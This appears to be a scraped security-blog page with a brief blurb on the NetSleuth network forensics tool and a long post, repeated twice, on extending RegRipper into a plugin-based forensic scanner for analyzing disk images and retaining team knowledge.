- Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
- Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.
[NetSleuth] Open source Network Forensics And Analysis Tools
Reviewed by 0x000216
on
Saturday, November 10, 2012
Rating: 5
Extending RegRipper (aka, "Forensic Scanner")
I'll be presenting on "Extending RegRipper" at Brian Carrier's Open Source Digital Forensics Conference on 14 June, along with Cory Altheide, and I wanted to provide a bit of background with regards to what my presentation will cover...
In '98-'99, I was working for Trident Data Systems, Inc., (TDS) conducting vulnerability assessments for organizations. One of the things we did as part of this work was run ISS’s Internet Scanner (now owned by IBM) against the infrastructure; either a full, broad-brush scan or just very specific segments, depending upon the needs and wants of the organization. I became very interested in how the scanner worked, and began to note differences in how the scanner would report its findings based on the level of access we had to the systems within the infrastructure. Something else I noticed was that many of the checks that were scanned were a result of the ISS X-Force vulnerability discovery team. In short, a couple of very smart folks would discover a vulnerability, add a means of scanning for that vulnerability via the Internet Scanner framework, and roll it out to thousands of customers. Within fairly short order, this check can be rolled out to hundreds or thousands of analysts, none of whom have any prior knowledge of the vulnerability, nor have had to invest the time to investigate it. This became even more clear as I started to create an open-source (albeit proprietary) scanner to replace the use of Internet Scanner, due in large part to significant issues with inaccurate checks, and the need to adapt the output. I could create a check to be run, and give it to an analyst going on-site, and they wouldn't need to have any prior knowledge of the issue, nor would they have to invest time in discovery and analysis, but they could run the check and easily review and understand the results.
Other aspects of information security also benefit from the use of scanners. Penetration testing and web application assessments benefit from scanners that include frameworks for providing new and updated checks to be run, and many of the analysts running the scanners have no prior knowledge of the checks that are being run. Nessus (from Tenable) is a very good example of this sort of scanner; the plugins run by the scanner are text-based, providing instructions for the scanner. These plugins are easy to open and read, and provide a great deal of information regarding how the checks are constructed and run.
Given all of the benefits derived from scanners in other disciplines within information security, it just stands to reason that digital forensic analysis would also benefit from a similar framework.
The forensic scanner is not intended to replace the analyst; rather, it is intended as a framework for documenting and retaining the institutional knowledge of all analysts on the team, and remove the tedium of looking for that "low-hanging fruit" that likely exists in most, if not all, exams.
A number of commercially available forensic analysis applications (EnCase, ProDiscover) have scripting languages and scanner-like functionality; however, in most cases, this functionality is based on proprietary APIs, and in some cases, scripting languages (ProDiscover uses Perl as it's scripting language, but the API for accessing the data is unique to the application).
A scanner framework is not meant to replace the use of commercial forensic analysis applications; rather, the scanner framework would augment and enhance the use of those applications, by providing an easy and efficient means for educating new analysts, as well as "sweeping up" the "low-hanging fruit", leaving the deeper analysis for the more experienced analysts.
This scanner framework would be based on easily available tools and techniques. For example, the scanner would be designed to access acquired images mounted read-only via the operating system (Linux mount command) or via freely available applications (Windows - FTK Imager v3.0, ImDisk, vhd/vmdk, etc.); that way, the scanner can make use of currently available APIs (via Perl, Python, etc.) in order to access data within the acquired image, and do so in a "forensically sound manner" (i.e., not making any changes to the original data).
The scanner is not intended to run in isolation; rather, it is intended to be used with other tools (here, here) as part of an overall process. The purpose of the scanner is to provide a means for retention, efficient deployment, and proliferation of institutional digital forensic knowledge.
Benefits
Some benefits of a forensic scanner framework such as this include, but are not limited to, the following:
1. Knowledge Retention - None of us knows everything, and we all see new things during examinations. When an analyst sees or discovers something new, a plugin can be written or updated. Once this is done, that knowledge exists, regardless of the state of the analyst (she goes on vacation, leaves for another position, etc.). Enforcing best practice documentation of the plugin ensures that as much knowledge as possible is retained along with the application, providing an excellent educational tool, as well as a ready means for adapting or improving the plugin.
2. Establish a career progression - When new folks are brought aboard a team, they have to start somewhere. In most cases, particularly with consulting organizations, skilled/experienced analysts are hired, but as the industry develops, this won't always be the case. The forensic scanner provides an ancillary framework for developing "home grown" expertise where inexperienced analysts are hired. Starting the new analysts off in a lab environment and having them begin learning the necessary procedures by acquiring and verifying media puts them in an excellent position to run the scanner. For example, the analyst either goes on-site and conducts acquisition, or acquires media sent to the lab, and prepares the necessary documentation. Then, they mount the acquired image and run the scanner, providing the more experienced analyst with the path to the acquired image and the report.
This framework also provides an objective means for personnel assessment; managers can easily track the plugins that are improved or developed by various analysts.
3. Teamwork - In many environments, development of plugins likely will not occur in a vacuum or in isolation. Plugins need to be reviewed, and can be improved based on the experience of other analysts. For example, let's say an analyst runs across a Zeus infection and decides to write a plugin for the artifacts. When the plugin is reviewed, another analyst mentions that Zeus will load differently based on the permissions of the user upon infection. The plugin can them be documented and modified to include additional conditions.
New plugins can be introduced and discussed during team meetings or through virtual conferences and collaboration, but regardless of the method, it introduces a very important aspect of forensic analysis...peer review.
4. Ease of modification - One size does not fit all. There are times when analysts will not be working with full images, but instead will only have access to selected files from systems. A properly constructed framework will provide the means necessary for accessing and scanning these limited data sets, as well. Also, reporting of the scanner can be modified according to the needs of the analyst, or organization.
5. Flexibility - A scanner framework is not limited to just acquired images. For example, F-Response provides a means of access to live, remote systems in a manner that is similar to an acquired image (i.e., much of the same API can be used, as with RegRipper), so the framework used to access images can also be used against systems accessed via F-Response. As the images themselves would be mounted read-only in order to be scanned, Volume Shadow Copies could also be mounted and scanned using the same scanner and same plugins.
Another means of flexibility comes about through the use of "idle" resources. What I mean by that is that many times, analysts working on-site or actively engaged in analysis may be extremely busy, so running the scanner and providing the output to another, off-site analyst who is not actively engaged frees up the on-site team and provides answers/solutions in a timely and efficient manner. Or, data can be provided and the off-site analyst can write a plugin based on that data, and that plugin can be run against all other systems/images. In these instances, entire images do not have to be sent to the off-site analyst, as this takes considerable time and can expose sensitive data. Instead, only very specific data is sent, making for a much smaller data set (KB as opposed to GB).
In '98-'99, I was working for Trident Data Systems, Inc., (TDS) conducting vulnerability assessments for organizations. One of the things we did as part of this work was run ISS’s Internet Scanner (now owned by IBM) against the infrastructure; either a full, broad-brush scan or just very specific segments, depending upon the needs and wants of the organization. I became very interested in how the scanner worked, and began to note differences in how the scanner would report its findings based on the level of access we had to the systems within the infrastructure. Something else I noticed was that many of the checks that were scanned were a result of the ISS X-Force vulnerability discovery team. In short, a couple of very smart folks would discover a vulnerability, add a means of scanning for that vulnerability via the Internet Scanner framework, and roll it out to thousands of customers. Within fairly short order, this check can be rolled out to hundreds or thousands of analysts, none of whom have any prior knowledge of the vulnerability, nor have had to invest the time to investigate it. This became even more clear as I started to create an open-source (albeit proprietary) scanner to replace the use of Internet Scanner, due in large part to significant issues with inaccurate checks, and the need to adapt the output. I could create a check to be run, and give it to an analyst going on-site, and they wouldn't need to have any prior knowledge of the issue, nor would they have to invest time in discovery and analysis, but they could run the check and easily review and understand the results.
Other aspects of information security also benefit from the use of scanners. Penetration testing and web application assessments benefit from scanners that include frameworks for providing new and updated checks to be run, and many of the analysts running the scanners have no prior knowledge of the checks that are being run. Nessus (from Tenable) is a very good example of this sort of scanner; the plugins run by the scanner are text-based, providing instructions for the scanner. These plugins are easy to open and read, and provide a great deal of information regarding how the checks are constructed and run.
Given all of the benefits derived from scanners in other disciplines within information security, it just stands to reason that digital forensic analysis would also benefit from a similar framework.
The forensic scanner is not intended to replace the analyst; rather, it is intended as a framework for documenting and retaining the institutional knowledge of all analysts on the team, and remove the tedium of looking for that "low-hanging fruit" that likely exists in most, if not all, exams.
A number of commercially available forensic analysis applications (EnCase, ProDiscover) have scripting languages and scanner-like functionality; however, in most cases, this functionality is based on proprietary APIs, and in some cases, scripting languages (ProDiscover uses Perl as it's scripting language, but the API for accessing the data is unique to the application).
A scanner framework is not meant to replace the use of commercial forensic analysis applications; rather, the scanner framework would augment and enhance the use of those applications, by providing an easy and efficient means for educating new analysts, as well as "sweeping up" the "low-hanging fruit", leaving the deeper analysis for the more experienced analysts.
This scanner framework would be based on easily available tools and techniques. For example, the scanner would be designed to access acquired images mounted read-only via the operating system (Linux mount command) or via freely available applications (Windows - FTK Imager v3.0, ImDisk, vhd/vmdk, etc.); that way, the scanner can make use of currently available APIs (via Perl, Python, etc.) in order to access data within the acquired image, and do so in a "forensically sound manner" (i.e., not making any changes to the original data).
The scanner is not intended to run in isolation; rather, it is intended to be used with other tools (here, here) as part of an overall process. The purpose of the scanner is to provide a means for retention, efficient deployment, and proliferation of institutional digital forensic knowledge.
Benefits
Some benefits of a forensic scanner framework such as this include, but are not limited to, the following:
1. Knowledge Retention - None of us knows everything, and we all see new things during examinations. When an analyst sees or discovers something new, a plugin can be written or updated. Once this is done, that knowledge exists, regardless of the state of the analyst (she goes on vacation, leaves for another position, etc.). Enforcing best practice documentation of the plugin ensures that as much knowledge as possible is retained along with the application, providing an excellent educational tool, as well as a ready means for adapting or improving the plugin.
2. Establish a career progression - When new folks are brought aboard a team, they have to start somewhere. In most cases, particularly with consulting organizations, skilled/experienced analysts are hired, but as the industry develops, this won't always be the case. The forensic scanner provides an ancillary framework for developing "home grown" expertise where inexperienced analysts are hired. Starting the new analysts off in a lab environment and having them begin learning the necessary procedures by acquiring and verifying media puts them in an excellent position to run the scanner. For example, the analyst either goes on-site and conducts acquisition, or acquires media sent to the lab, and prepares the necessary documentation. Then, they mount the acquired image and run the scanner, providing the more experienced analyst with the path to the acquired image and the report.
This framework also provides an objective means for personnel assessment; managers can easily track the plugins that are improved or developed by various analysts.
3. Teamwork - In many environments, development of plugins likely will not occur in a vacuum or in isolation. Plugins need to be reviewed, and can be improved based on the experience of other analysts. For example, let's say an analyst runs across a Zeus infection and decides to write a plugin for the artifacts. When the plugin is reviewed, another analyst mentions that Zeus will load differently based on the permissions of the user upon infection. The plugin can them be documented and modified to include additional conditions.
New plugins can be introduced and discussed during team meetings or through virtual conferences and collaboration, but regardless of the method, it introduces a very important aspect of forensic analysis...peer review.
4. Ease of modification - One size does not fit all. There are times when analysts will not be working with full images, but instead will only have access to selected files from systems. A properly constructed framework will provide the means necessary for accessing and scanning these limited data sets, as well. Also, reporting of the scanner can be modified according to the needs of the analyst, or organization.
5. Flexibility - A scanner framework is not limited to just acquired images. For example, F-Response provides a means of access to live, remote systems in a manner that is similar to an acquired image (i.e., much of the same API can be used, as with RegRipper), so the framework used to access images can also be used against systems accessed via F-Response. As the images themselves would be mounted read-only in order to be scanned, Volume Shadow Copies could also be mounted and scanned using the same scanner and same plugins.
Another means of flexibility comes about through the use of "idle" resources. What I mean by that is that many times, analysts working on-site or actively engaged in analysis may be extremely busy, so running the scanner and providing the output to another, off-site analyst who is not actively engaged frees up the on-site team and provides answers/solutions in a timely and efficient manner. Or, data can be provided and the off-site analyst can write a plugin based on that data, and that plugin can be run against all other systems/images. In these instances, entire images do not have to be sent to the off-site analyst, as this takes considerable time and can expose sensitive data. Instead, only very specific data is sent, making for a much smaller data set (KB as opposed to GB).
Extending RegRipper (aka, "Forensic Scanner")
Reviewed by 0x000216
on
Friday, April 22, 2011
Rating: 5